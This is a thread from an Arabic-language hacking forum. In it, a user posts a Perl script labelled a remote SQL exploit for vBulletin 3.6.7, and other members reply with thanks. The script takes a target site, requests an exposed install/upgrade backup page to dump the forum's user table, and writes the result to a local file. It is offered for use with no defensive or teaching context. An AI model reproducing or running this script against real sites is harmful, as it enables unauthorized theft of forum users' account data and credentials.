1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : mr.grey hat | المشاهدات : 475 | الردود : 12
الوسوم:
حالة الموضوع:
مغلق
  1. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    بسم الله الرحمن الرحيم

    أسم الثغرة : vBulletin 3.6.7 Remote SQL Exploit
    مكتشف الثغرة : Hani Xavi
    المصدر : vBulletin 3.6.7 Remote SQL Exploit

    الاستغلال:
    [SQL]
    vBulletin 3.6.7 Remote SQL Exploit By Hani Xavi



    U need To Watch The Vidéo :) : https://www.youtube.com/watch?v=X1nZmwPrzQI



    #!/usr/bin/perl

    use LWP::UserAgent;

    use HTTP::Request;

    system("clear");

    print "------------------------------------------------\n";

    print " vBulletin 3.6.7 Exploit \n";

    print " Coded by Hani Xavi \n";

    print "------------------------------------------------\n";

    $target = $ARGV[0];

    $path = $ARGV[1];

    if($target eq '')

    {

    print "[*] Usage: perl vb.pl <target> <path> \n";

    exit(1);

    }



    if($target !~ /http:\/\//)

    {

    $target = "http://$target";

    }

    sleep 1;

    print "[*] Exploiting . . \n";

    $agent = LWP::UserAgent->new();

    $agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');

    $website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";

    $req = $agent->request(HTTP::Request->new(GET=>$website));

    if($req->is_success)

    {

    open(FILE, "> vBulletin_content.txt");

    print FILE $req->content;

    close(FILE);

    print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";

    }

    else

    {

    print "[-] Exploit not sent . \n";

    }
    [/SQL]
     
  2. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: vBulletin 3.6.7 Remote SQL Exploit

    وعليكم السلام
    بارك الله بيك
     
  3. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: vBulletin 3.6.7 Remote SQL Exploit

    وبيك أخي الكريم وشكرا على المرور ​
     
  4. saudi-hack Developer

    الأنتساب:
    ‏30 أغسطس 2012
    المشاركات:
    105
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    الإقامة:
    الـــريآضض
    نظام التشغيل:
    Linux
    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك العافية و يخليك إن شاء الله
     
  5. KhaLaF V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    667
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    210
    الجنس:
    ذكر
    الوظيفة:
    طـآلـب
    الإقامة:
    (-مـEgypTـصر-)
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: vBulletin 3.6.7 Remote SQL Exploit

    كم أنت مبدع
    :ُae@: :ُae@:
     
  6. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: vBulletin 3.6.7 Remote SQL Exploit

    مشكورين أخواني على المرور نورتو صفحتي ​
     
  7. LiMoO Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    30
    الوظيفة:
    مطور مواقع
    الإقامة:
    المحروسـهـ
    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك الصحة أخي :ُeُe.1:
     
  8. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي أخ LiMoO مشكور على مرورك ​
     
  9. G3niUs.M4n Developer

    الأنتساب:
    ‏14 مايو 2012
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    جــــدهـ ~
    رد: vBulletin 3.6.7 Remote SQL Exploit

    بارك الله بك و نفع بك
     
  10. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي رب ومشكور أخوي G3niUs.M4n على مرورك العطر ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة